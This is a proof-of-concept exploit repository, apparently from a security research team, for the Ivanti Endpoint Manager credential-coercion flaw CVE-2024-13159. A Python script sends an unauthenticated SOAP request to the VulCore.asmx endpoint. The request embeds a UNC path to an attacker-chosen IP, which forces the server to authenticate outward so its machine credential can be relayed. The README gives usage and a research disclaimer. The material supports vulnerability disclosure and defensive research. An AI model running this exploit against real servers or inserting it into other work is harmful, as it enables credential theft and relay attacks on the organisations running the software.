├── CVE-2024-13159.py
└── README.md


/CVE-2024-13159.py:
--------------------------------------------------------------------------------
 1 | import argparse
 2 | import requests
 3 | import urllib3
 4 | urllib3.disable_warnings()
 5 | 
 6 | XML_PAYLOAD = """<?xml version="1.0" encoding="utf-8"?>
 7 | <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
 8 |     <soap:Body>
 9 |         <GetHashForWildcardRecursive xmlns="http://tempuri.org/">
10 |             <wildcard>\\\\{}\\tmp\\file1.txt</wildcard> 
11 |         </GetHashForWildcardRecursive>
12 |     </soap:Body>
13 | </soap:Envelope>
14 | """
15 | 
16 | 
17 | def exploit(url, relay_target):
18 |     h = {
19 |             "Content-Type": "text/xml",
20 |             "Soapaction": "http://tempuri.org/GetHashForWildcardRecursive",
21 |         }
22 |     xml_payload = XML_PAYLOAD.format(relay_target)
23 |     print(xml_payload)
24 |     try:
25 |         r = requests.post(f"{url}/WSVulnerabilityCore/VulCore.asmx", data=xml_payload, headers=h, verify=False, timeout=30)
26 |         print(r.text)
27 |         print(r.status_code)
28 |     except TimeoutError:
29 |         # Expected to timeout given it keeps connection open for process duration
30 |         pass
31 | 
32 | if __name__ == "__main__":
33 |     parser = argparse.ArgumentParser()
34 |     parser.add_argument('-u', '--url', help='The base URL of the target', required=True)
35 |     parser.add_argument('-t', '--target', help='The target IP to reach out to', type=str, required=True)
36 |     args = parser.parse_args()
37 | 
38 |     exploit(args.url, args.target)
39 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Ivanti EPM Coercion Vulnerabilities
 2 | Proof of concept exploits for Ivanti EPM CVE-2024-13159 and others which allows for unauthenticated coercion of the Ivanti EPM machine credential for use in relay attacks.
 3 | 
 4 | ## Blog Post
 5 | Deep-dive analysis here:
 6 | [https://www.horizon3.ai/attack-research/attack-blogs/ivanti-endpoint-manager-multiple-credential-coercion-vulnerabilities/](https://www.horizon3.ai/attack-research/attack-blogs/ivanti-endpoint-manager-multiple-credential-coercion-vulnerabilities/)
 7 | 
 8 | ## Usage
 9 | ```
10 | % python3 CVE-2024-13159.py -h
11 | usage: CVE-2024-13159.py [-h] -u URL -t TARGET
12 | 
13 | options:
14 |   -h, --help            show this help message and exit
15 |   -u URL, --url URL     The base URL of the target
16 |   -t TARGET, --target TARGET
17 |                         The target IP to reach out to
18 | ```
19 | 
20 | ## Follow the Horizon3.ai Attack Team on Twitter for the latest security research:
21 | *  [Horizon3 Attack Team](https://twitter.com/Horizon3Attack)
22 | *  [James Horseman](https://twitter.com/JamesHorseman2)
23 | *  [Zach Hanley](https://twitter.com/hacks_zach)
24 | 
25 | ## Disclaimer
26 | This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
27 | 
28 | 


--------------------------------------------------------------------------------